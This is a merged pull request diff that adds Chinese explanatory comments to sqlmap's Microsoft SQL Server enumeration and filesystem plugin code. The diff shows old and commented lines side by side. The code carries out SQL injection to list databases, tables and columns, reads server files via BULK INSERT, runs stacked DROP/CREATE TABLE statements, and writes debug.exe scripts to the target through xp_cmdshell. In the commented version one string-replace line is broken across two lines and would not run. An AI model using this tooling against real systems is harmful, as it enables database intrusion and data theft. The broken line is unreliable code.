王生晖 #20

Merged
ptnqoxywl merged 1 commits from wangshenghui_new_branch into main 2 months ago

@ -5,45 +5,50 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.agent import agent
from lib.core.common import arrayizeValue
from lib.core.common import getLimitRange
from lib.core.common import isInferenceAvailable
from lib.core.common import isNoneValue
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import safeSQLIdentificatorNaming
from lib.core.common import safeStringFormat
from lib.core.common import singleTimeLogMessage
from lib.core.common import unArrayizeValue
from lib.core.common import unsafeSQLIdentificatorNaming
from lib.core.compat import xrange
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import CURRENT_DB
from lib.request import inject
from plugins.generic.enumeration import Enumeration as GenericEnumeration
from thirdparty import six
# 导入必要的模块
import re # 导入正则表达式模块,用于进行模式匹配
from lib.core.agent import agent # 导入 agent 模块,用于执行 SQL 注入
from lib.core.common import arrayizeValue # 导入 arrayizeValue 函数,用于将值转换为列表
from lib.core.common import getLimitRange # 导入 getLimitRange 函数,用于生成限制范围
from lib.core.common import isInferenceAvailable # 导入 isInferenceAvailable 函数,用于检查是否可以使用推断注入
from lib.core.common import isNoneValue # 导入 isNoneValue 函数,用于检查值是否为 None
from lib.core.common import isNumPosStrValue # 导入 isNumPosStrValue 函数,用于检查值是否为正数字字符串
from lib.core.common import isTechniqueAvailable # 导入 isTechniqueAvailable 函数,用于检查指定的注入技术是否可用
from lib.core.common import safeSQLIdentificatorNaming # 导入 safeSQLIdentificatorNaming 函数,用于安全地命名 SQL 标识符
from lib.core.common import safeStringFormat # 导入 safeStringFormat 函数,用于安全地格式化字符串
from lib.core.common import singleTimeLogMessage # 导入 singleTimeLogMessage 函数,用于只输出一次的日志消息
from lib.core.common import unArrayizeValue # 导入 unArrayizeValue 函数,用于从列表中提取值
from lib.core.common import unsafeSQLIdentificatorNaming # 导入 unsafeSQLIdentificatorNaming 函数,用于不安全地命名 SQL 标识符
from lib.core.compat import xrange # 导入 xrange 函数,用于兼容 Python 2 和 3 的循环
from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.data import queries # 导入 queries 对象,用于获取预定义的 SQL 查询语句
from lib.core.enums import CHARSET_TYPE # 导入 CHARSET_TYPE 枚举,定义字符集类型
from lib.core.enums import DBMS # 导入 DBMS 枚举,定义数据库管理系统类型
from lib.core.enums import EXPECTED # 导入 EXPECTED 枚举,定义期望的返回值类型
from lib.core.enums import PAYLOAD # 导入 PAYLOAD 枚举,定义注入类型
from lib.core.exception import SqlmapNoneDataException # 导入 SqlmapNoneDataException 异常类,用于表示没有数据
from lib.core.settings import CURRENT_DB # 导入 CURRENT_DB 常量,表示当前数据库
from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
from plugins.generic.enumeration import Enumeration as GenericEnumeration # 导入 GenericEnumeration 类,作为当前类的父类
from thirdparty import six # 导入 six 模块,用于兼容 Python 2 和 3
# 定义 Enumeration 类,继承自 GenericEnumeration
class Enumeration(GenericEnumeration):
# 定义 getPrivileges 方法,用于获取数据库用户的权限
def getPrivileges(self, *args, **kwargs):
# 输出警告信息,说明在 Microsoft SQL Server 上无法获取用户权限,只会检查是否是 DBA
warnMsg = "on Microsoft SQL Server it is not possible to fetch "
warnMsg += "database users privileges, sqlmap will check whether "
warnMsg += "or not the database users are database administrators"
logger.warning(warnMsg)
users = []
areAdmins = set()
users = [] # 初始化用户列表
areAdmins = set() # 初始化管理员集合
# 如果配置中指定了用户,则使用该用户,否则获取所有用户
if conf.user:
users = [conf.user]
elif not len(kb.data.cachedUsers):
@ -51,91 +56,114 @@ class Enumeration(GenericEnumeration):
else:
users = kb.data.cachedUsers
# 遍历用户列表
for user in users:
user = unArrayizeValue(user)
user = unArrayizeValue(user) # 从列表中提取用户
if user is None:
if user is None: # 如果用户为 None则跳过
continue
isDba = self.isDba(user)
isDba = self.isDba(user) # 检查用户是否为 DBA
if isDba is True:
if isDba is True: # 如果是 DBA则添加到管理员集合
areAdmins.add(user)
kb.data.cachedUsersPrivileges[user] = None
kb.data.cachedUsersPrivileges[user] = None # 设置用户的权限信息为 None
# 返回用户的权限信息和管理员集合
return (kb.data.cachedUsersPrivileges, areAdmins)
# 定义 getTables 方法,用于获取数据库表
def getTables(self):
# 如果知识库中已缓存表信息,则直接返回
if len(kb.data.cachedTables) > 0:
return kb.data.cachedTables
self.forceDbmsEnum()
self.forceDbmsEnum() # 强制执行 DBMS 枚举
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则分割数据库字符串,否则获取所有数据库
if conf.db:
dbs = conf.db.split(',')
else:
dbs = self.getDbs()
# 对每个数据库名进行安全命名
for db in dbs:
dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db)
# 移除空字符串的数据库
dbs = [_ for _ in dbs if _]
# 输出获取表信息的提示信息
infoMsg = "fetching tables for database"
infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, six.string_types) else db[0] for db in sorted(dbs)))
logger.info(infoMsg)
# 获取 SQL Server 的表查询语句
rootQuery = queries[DBMS.MSSQL].tables
# 检查是否可以使用 UNION、ERROR、QUERY 注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
# 遍历数据库列表
for db in dbs:
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList:
infoMsg = "skipping system database '%s'" % db
singleTimeLogMessage(infoMsg)
continue
# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
infoMsg = "skipping database '%s'" % db
singleTimeLogMessage(infoMsg)
continue
# 尝试使用不同的查询语句获取表信息
for query in (rootQuery.inband.query, rootQuery.inband.query2, rootQuery.inband.query3):
query = query.replace("%s", db)
value = inject.getValue(query, blind=False, time=False)
if not isNoneValue(value):
value = inject.getValue(query, blind=False, time=False) # 执行注入并获取结果
if not isNoneValue(value): # 如果结果不为 None则跳出循环
break
# 如果获取到了表信息,则进行处理
if not isNoneValue(value):
value = [_ for _ in arrayizeValue(value) if _]
value = [safeSQLIdentificatorNaming(unArrayizeValue(_), True) for _ in value]
kb.data.cachedTables[db] = value
value = [_ for _ in arrayizeValue(value) if _] # 将结果转换为列表
value = [safeSQLIdentificatorNaming(unArrayizeValue(_), True) for _ in value] # 安全命名表名
kb.data.cachedTables[db] = value # 将表信息缓存到知识库
# 如果没有获取到表信息,并且可以使用推断注入,则使用推断注入获取表信息
if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct:
# 遍历数据库列表
for db in dbs:
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList:
infoMsg = "skipping system database '%s'" % db
singleTimeLogMessage(infoMsg)
continue
# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
infoMsg = "skipping database '%s'" % db
singleTimeLogMessage(infoMsg)
continue
# 输出获取表数量的提示信息
infoMsg = "fetching number of tables for "
infoMsg += "database '%s'" % db
logger.info(infoMsg)
# 尝试使用不同的查询语句获取表数量
for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3):
_ = query.replace("%s", db)
count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNoneValue(count):
count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 执行推断注入并获取结果
if not isNoneValue(count): # 如果结果不为 None则跳出循环
break
# 如果没有获取到有效的表数量,则跳过
if not isNumPosStrValue(count):
if count != 0:
warnMsg = "unable to retrieve the number of "
@ -143,17 +171,18 @@ class Enumeration(GenericEnumeration):
logger.warning(warnMsg)
continue
tables = []
tables = [] # 初始化表列表
# 遍历表索引,获取每个表名
for index in xrange(int(count)):
_ = safeStringFormat((rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db), index)
table = inject.getValue(_, union=False, error=False)
if not isNoneValue(table):
table = inject.getValue(_, union=False, error=False) # 执行推断注入并获取结果
if not isNoneValue(table): # 如果结果不为 None则添加到表列表
kb.hintValue = table
table = safeSQLIdentificatorNaming(table, True)
table = safeSQLIdentificatorNaming(table, True) # 安全命名表名
tables.append(table)
# 如果获取到了表信息,则进行缓存,否则输出警告信息
if tables:
kb.data.cachedTables[db] = tables
else:
@ -161,25 +190,31 @@ class Enumeration(GenericEnumeration):
warnMsg += "for database '%s'" % db
logger.warning(warnMsg)
# 如果没有获取到表信息,并且没有指定搜索,则抛出异常
if not kb.data.cachedTables and not conf.search:
errMsg = "unable to retrieve the tables for any database"
raise SqlmapNoneDataException(errMsg)
else:
# 对缓存的表名进行排序
for db, tables in kb.data.cachedTables.items():
kb.data.cachedTables[db] = sorted(tables) if tables else tables
# 返回缓存的表信息
return kb.data.cachedTables
# 定义 searchTable 方法,用于搜索指定的表
def searchTable(self):
foundTbls = {}
tblList = conf.tbl.split(',')
rootQuery = queries[DBMS.MSSQL].search_table
tblCond = rootQuery.inband.condition
tblConsider, tblCondParam = self.likeOrExact("table")
foundTbls = {} # 初始化找到的表字典
tblList = conf.tbl.split(',') # 获取要搜索的表列表
rootQuery = queries[DBMS.MSSQL].search_table # 获取 SQL Server 的表搜索查询语句
tblCond = rootQuery.inband.condition # 获取表搜索条件
tblConsider, tblCondParam = self.likeOrExact("table") # 获取表搜索的方式 (LIKE 或 EXACT)
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则分割数据库字符串,否则获取所有数据库
if conf.db:
enumDbs = conf.db.split(',')
elif not len(kb.data.cachedDbs):
@ -187,40 +222,48 @@ class Enumeration(GenericEnumeration):
else:
enumDbs = kb.data.cachedDbs
# 初始化每个数据库的表搜索结果
for db in enumDbs:
db = safeSQLIdentificatorNaming(db)
foundTbls[db] = []
# 遍历要搜索的表列表
for tbl in tblList:
tbl = safeSQLIdentificatorNaming(tbl, True)
tbl = safeSQLIdentificatorNaming(tbl, True) # 安全命名表名
# 输出搜索表信息的提示信息
infoMsg = "searching table"
if tblConsider == "1":
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
logger.info(infoMsg)
# 构建表搜索查询条件
tblQuery = "%s%s" % (tblCond, tblCondParam)
tblQuery = tblQuery % unsafeSQLIdentificatorNaming(tbl)
# 遍历数据库列表
for db in foundTbls.keys():
db = safeSQLIdentificatorNaming(db)
db = safeSQLIdentificatorNaming(db) # 安全命名数据库名
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList:
infoMsg = "skipping system database '%s'" % db
singleTimeLogMessage(infoMsg)
continue
# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
infoMsg = "skipping database '%s'" % db
singleTimeLogMessage(infoMsg)
continue
# 检查是否可以使用 UNION、ERROR、QUERY 注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
query = rootQuery.inband.query.replace("%s", db)
query += tblQuery
values = inject.getValue(query, blind=False, time=False)
values = inject.getValue(query, blind=False, time=False) # 执行注入并获取结果
# 如果获取到了表信息,则进行处理
if not isNoneValue(values):
if isinstance(values, six.string_types):
values = [values]
@ -230,7 +273,9 @@ class Enumeration(GenericEnumeration):
continue
foundTbls[db].append(foundTbl)
# 如果无法使用上述注入,则使用推断注入搜索表信息
else:
# 输出获取表数量的提示信息
infoMsg = "fetching number of table"
if tblConsider == "1":
infoMsg += "s LIKE"
@ -240,8 +285,8 @@ class Enumeration(GenericEnumeration):
query = rootQuery.blind.count
query = query.replace("%s", db)
query += " AND %s" % tblQuery
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 执行推断注入并获取结果
# 如果没有获取到有效的表数量,则跳过
if not isNumPosStrValue(count):
warnMsg = "no table"
if tblConsider == "1":
@ -252,50 +297,57 @@ class Enumeration(GenericEnumeration):
continue
indexRange = getLimitRange(count)
indexRange = getLimitRange(count) # 生成索引范围
# 遍历表索引,获取每个表名
for index in indexRange:
query = rootQuery.blind.query
query = query.replace("%s", db)
query += " AND %s" % tblQuery
query = agent.limitQuery(index, query, tblCond)
tbl = inject.getValue(query, union=False, error=False)
tbl = inject.getValue(query, union=False, error=False) # 执行推断注入并获取结果
kb.hintValue = tbl
foundTbls[db].append(tbl)
# 清理空的数据库表列表
for db, tbls in list(foundTbls.items()):
if len(tbls) == 0:
foundTbls.pop(db)
# 如果没有找到任何表,则输出警告信息
if not foundTbls:
warnMsg = "no databases contain any of the provided tables"
logger.warning(warnMsg)
return
conf.dumper.dbTables(foundTbls)
self.dumpFoundTables(foundTbls)
conf.dumper.dbTables(foundTbls) # 将找到的表信息输出到文件
self.dumpFoundTables(foundTbls) # 输出找到的表信息
# 定义 searchColumn 方法,用于搜索指定的列
def searchColumn(self):
rootQuery = queries[DBMS.MSSQL].search_column
foundCols = {}
dbs = {}
whereTblsQuery = ""
infoMsgTbl = ""
infoMsgDb = ""
colList = conf.col.split(',')
rootQuery = queries[DBMS.MSSQL].search_column # 获取 SQL Server 的列搜索查询语句
foundCols = {} # 初始化找到的列字典
dbs = {} # 初始化数据库字典
whereTblsQuery = "" # 初始化表 WHERE 条件
infoMsgTbl = "" # 初始化表信息
infoMsgDb = "" # 初始化数据库信息
colList = conf.col.split(',') # 获取要搜索的列列表
# 如果配置中指定了排除的列,则跳过
if conf.exclude:
colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]
origTbl = conf.tbl
origDb = conf.db
colCond = rootQuery.inband.condition
tblCond = rootQuery.inband.condition2
colConsider, colCondParam = self.likeOrExact("column")
origTbl = conf.tbl # 保存原始的表配置
origDb = conf.db # 保存原始的数据库配置
colCond = rootQuery.inband.condition # 获取列搜索条件
tblCond = rootQuery.inband.condition2 # 获取表搜索条件
colConsider, colCondParam = self.likeOrExact("column") # 获取列搜索的方式 (LIKE 或 EXACT)
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则分割数据库字符串,否则获取所有数据库
if conf.db:
enumDbs = conf.db.split(',')
elif not len(kb.data.cachedDbs):
@ -303,30 +355,36 @@ class Enumeration(GenericEnumeration):
else:
enumDbs = kb.data.cachedDbs
# 初始化每个数据库的列搜索结果
for db in enumDbs:
db = safeSQLIdentificatorNaming(db)
dbs[db] = {}
# 遍历要搜索的列列表
for column in colList:
column = safeSQLIdentificatorNaming(column)
conf.db = origDb
conf.tbl = origTbl
column = safeSQLIdentificatorNaming(column) # 安全命名列名
conf.db = origDb # 恢复原始的数据库配置
conf.tbl = origTbl # 恢复原始的表配置
# 输出搜索列信息的提示信息
infoMsg = "searching column"
if colConsider == "1":
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column)
foundCols[column] = {}
foundCols[column] = {} # 初始化每个列的搜索结果
# 如果配置中指定了表,则构建表的 WHERE 条件
if conf.tbl:
_ = conf.tbl.split(',')
whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")"
infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(tbl for tbl in _))
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则构建数据库信息,否则获取所有数据库
if conf.db:
_ = conf.db.split(',')
infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _))
@ -337,30 +395,35 @@ class Enumeration(GenericEnumeration):
logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb))
# 构建列搜索查询条件
colQuery = "%s%s" % (colCond, colCondParam)
colQuery = colQuery % unsafeSQLIdentificatorNaming(column)
# 遍历数据库列表
for db in (_ for _ in dbs if _):
db = safeSQLIdentificatorNaming(db)
db = safeSQLIdentificatorNaming(db) # 安全命名数据库名
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList:
continue
# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
continue
# 检查是否可以使用 UNION、ERROR、QUERY 注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
query = rootQuery.inband.query % (db, db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db)
values = inject.getValue(query, blind=False, time=False)
values = inject.getValue(query, blind=False, time=False) # 执行注入并获取结果
# 如果获取到了列信息,则进行处理
if not isNoneValue(values):
if isinstance(values, six.string_types):
values = [values]
for foundTbl in values:
foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True)
foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True) # 安全命名表名
if foundTbl is None:
continue
@ -373,7 +436,7 @@ class Enumeration(GenericEnumeration):
conf.tbl = foundTbl
conf.col = column
self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False)
self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) # 获取列信息
if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db] and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):
dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl])
@ -386,9 +449,11 @@ class Enumeration(GenericEnumeration):
foundCols[column][db].append(foundTbl)
else:
foundCols[column][db] = [foundTbl]
# 如果无法使用上述注入,则使用推断注入搜索列信息
else:
foundCols[column][db] = []
# 输出获取包含该列的表数量的提示信息
infoMsg = "fetching number of tables containing column"
if colConsider == "1":
infoMsg += "s LIKE"
@ -399,8 +464,9 @@ class Enumeration(GenericEnumeration):
query = query % (db, db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db)
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 执行推断注入并获取结果
# 如果没有获取到有效的表数量,则跳过
if not isNumPosStrValue(count):
warnMsg = "no tables contain column"
if colConsider == "1":
@ -411,18 +477,19 @@ class Enumeration(GenericEnumeration):
continue
indexRange = getLimitRange(count)
indexRange = getLimitRange(count) # 生成索引范围
# 遍历表索引,获取每个表名
for index in indexRange:
query = rootQuery.blind.query
query = query % (db, db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db)
query = agent.limitQuery(index, query, colCond.replace("[DB]", db))
tbl = inject.getValue(query, union=False, error=False)
tbl = inject.getValue(query, union=False, error=False) # 执行推断注入并获取结果
kb.hintValue = tbl
tbl = safeSQLIdentificatorNaming(tbl, True)
tbl = safeSQLIdentificatorNaming(tbl, True) # 安全命名表名
if tbl not in dbs[db]:
dbs[db][tbl] = {}
@ -432,7 +499,7 @@ class Enumeration(GenericEnumeration):
conf.tbl = tbl
conf.col = column
self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False)
self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) # 获取列信息
if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]:
dbs[db][tbl].update(kb.data.cachedColumns[db][tbl])
@ -440,7 +507,7 @@ class Enumeration(GenericEnumeration):
else:
dbs[db][tbl][column] = None
foundCols[column][db].append(tbl)
foundCols[column][db].append(tbl) # 将找到的表添加到结果中
conf.dumper.dbColumns(foundCols, colConsider, dbs)
self.dumpFoundColumn(dbs, foundCols, colConsider)
conf.dumper.dbColumns(foundCols, colConsider, dbs) # 将找到的列信息输出到文件
self.dumpFoundColumn(dbs, foundCols, colConsider) # 输出找到的列信息

@ -5,75 +5,81 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import ntpath
import os
from lib.core.common import checkFile
from lib.core.common import getLimitRange
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import posixToNtSlashes
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.compat import xrange
from lib.core.convert import encodeBase64
from lib.core.convert import encodeHex
from lib.core.convert import rot13
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject
from plugins.generic.filesystem import Filesystem as GenericFilesystem
# 导入必要的模块
import ntpath # 导入 ntpath 模块,用于处理 Windows 路径
import os # 导入 os 模块,用于执行操作系统相关操作
from lib.core.common import checkFile # 导入 checkFile 函数,用于检查文件是否存在
from lib.core.common import getLimitRange # 导入 getLimitRange 函数,用于生成限制范围
from lib.core.common import isNumPosStrValue # 导入 isNumPosStrValue 函数,用于检查值是否为正数字字符串
from lib.core.common import isTechniqueAvailable # 导入 isTechniqueAvailable 函数,用于检查指定的注入技术是否可用
from lib.core.common import posixToNtSlashes # 导入 posixToNtSlashes 函数,用于将 POSIX 路径转换为 NT 路径
from lib.core.common import randomStr # 导入 randomStr 函数,用于生成随机字符串
from lib.core.common import readInput # 导入 readInput 函数,用于读取用户输入
from lib.core.compat import xrange # 导入 xrange 函数,用于兼容 Python 2 和 3 的循环
from lib.core.convert import encodeBase64 # 导入 encodeBase64 函数,用于 Base64 编码
from lib.core.convert import encodeHex # 导入 encodeHex 函数,用于十六进制编码
from lib.core.convert import rot13 # 导入 rot13 函数,用于 ROT13 编码
from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.enums import CHARSET_TYPE # 导入 CHARSET_TYPE 枚举,定义字符集类型
from lib.core.enums import EXPECTED # 导入 EXPECTED 枚举,定义期望的返回值类型
from lib.core.enums import PAYLOAD # 导入 PAYLOAD 枚举,定义注入类型
from lib.core.exception import SqlmapNoneDataException # 导入 SqlmapNoneDataException 异常类,用于表示没有数据
from lib.core.exception import SqlmapUnsupportedFeatureException # 导入 SqlmapUnsupportedFeatureException 异常类,用于表示不支持的功能
from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
from plugins.generic.filesystem import Filesystem as GenericFilesystem # 导入 GenericFilesystem 类,作为当前类的父类
# 定义 Filesystem 类,继承自 GenericFilesystem
class Filesystem(GenericFilesystem):
# 定义 _dataToScr 方法,用于将数据转换为 debug.exe 脚本
def _dataToScr(self, fileContent, chunkName):
fileLines = []
fileSize = len(fileContent)
lineAddr = 0x100
lineLen = 20
fileLines = [] # 初始化文件行列表
fileSize = len(fileContent) # 获取文件大小
lineAddr = 0x100 # 设置起始地址
lineLen = 20 # 设置每行长度
fileLines.append("n %s" % chunkName)
fileLines.append("rcx")
fileLines.append("%x" % fileSize)
fileLines.append("f 0100 %x 00" % fileSize)
fileLines.append("n %s" % chunkName) # 添加 debug.exe 的 'n' 命令,用于设置文件名
fileLines.append("rcx") # 添加 debug.exe 的 'rcx' 命令,用于设置寄存器 cx
fileLines.append("%x" % fileSize) # 添加文件大小
fileLines.append("f 0100 %x 00" % fileSize) # 添加 debug.exe 的 'f' 命令,用于填充内存
# 遍历文件内容,将每一行转换为 debug.exe 的 'e' 命令
for fileLine in xrange(0, len(fileContent), lineLen):
scrString = ""
scrString = "" # 初始化每行字符串
for lineChar in fileContent[fileLine:fileLine + lineLen]:
strLineChar = encodeHex(lineChar, binary=False)
strLineChar = encodeHex(lineChar, binary=False) # 将字符转换为十六进制字符串
if not scrString:
scrString = "e %x %s" % (lineAddr, strLineChar)
scrString = "e %x %s" % (lineAddr, strLineChar) # 如果是第一个字符,则添加 'e' 命令
else:
scrString += " %s" % strLineChar
scrString += " %s" % strLineChar # 添加字符
lineAddr += len(strLineChar) // 2
lineAddr += len(strLineChar) // 2 # 更新地址
fileLines.append(scrString)
fileLines.append(scrString) # 添加到文件行列表
fileLines.append("w")
fileLines.append("q")
fileLines.append("w") # 添加 debug.exe 的 'w' 命令,用于写入文件
fileLines.append("q") # 添加 debug.exe 的 'q' 命令,用于退出 debug.exe
return fileLines
return fileLines # 返回文件行列表
# 定义 _updateDestChunk 方法,用于更新目标文件的 chunk
def _updateDestChunk(self, fileContent, tmpPath):
randScr = "tmpf%s.scr" % randomStr(lowercase=True)
chunkName = randomStr(lowercase=True)
fileScrLines = self._dataToScr(fileContent, chunkName)
randScr = "tmpf%s.scr" % randomStr(lowercase=True) # 生成随机的 debug.exe 脚本文件名
chunkName = randomStr(lowercase=True) # 生成随机的 chunk 文件名
fileScrLines = self._dataToScr(fileContent, chunkName) # 将文件内容转换为 debug.exe 脚本
logger.debug("uploading debug script to %s\\%s, please wait.." % (tmpPath, randScr))
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr)
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr) # 使用 xp_cmdshell 将 debug.exe 脚本写入到服务器
logger.debug("generating chunk file %s\\%s from debug script %s" % (tmpPath, chunkName, randScr))
# 执行 debug.exe 脚本,生成 chunk 文件
commands = (
"cd \"%s\"" % tmpPath,
"debug < %s" % randScr,
@ -82,25 +88,26 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands))
return chunkName
return chunkName # 返回 chunk 文件名
# 定义 stackedReadFile 方法,用于读取服务器文件内容,使用堆叠查询
def stackedReadFile(self, remoteFile):
if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg)
result = []
txtTbl = self.fileTblName
hexTbl = "%s%shex" % (self.fileTblName, randomStr())
result = [] # 初始化结果列表
txtTbl = self.fileTblName # 获取文件表名
hexTbl = "%s%shex" % (self.fileTblName, randomStr()) # 生成十六进制表名
self.createSupportTbl(txtTbl, self.tblField, "text")
inject.goStacked("DROP TABLE %s" % hexTbl)
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
self.createSupportTbl(txtTbl, self.tblField, "text") # 创建支持表,用于存储文件内容
inject.goStacked("DROP TABLE %s" % hexTbl) # 删除十六进制表
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)")) # 创建十六进制表
logger.debug("loading the content of file '%s' into support table" % remoteFile)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True) # 使用 BULK INSERT 将文件内容读取到支持表
# Reference: https://web.archive.org/web/20120211184457/http://support.microsoft.com/kb/104829
# 将二进制数据转换为十六进制字符串的 SQL 查询
binToHexQuery = """DECLARE @charset VARCHAR(16)
DECLARE @counter INT
DECLARE @hexstr VARCHAR(4096)
@ -139,67 +146,76 @@ class Filesystem(GenericFilesystem):
END
""" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ")
inject.goStacked(binToHexQuery)
binToHexQuery = binToHexQuery.replace(" ", "").replace("\
", " ") # 移除多余空格和换行符
inject.goStacked(binToHexQuery) # 执行 SQL 查询,将二进制数据转换为十六进制字符串
# 如果可以使用 UNION 注入,则直接读取十六进制表
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False)
# 如果无法使用 UNION 注入,则使用推断注入来读取十六进制表
if not result:
result = []
count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取十六进制表的行数
if not isNumPosStrValue(count):
errMsg = "unable to retrieve the content of the "
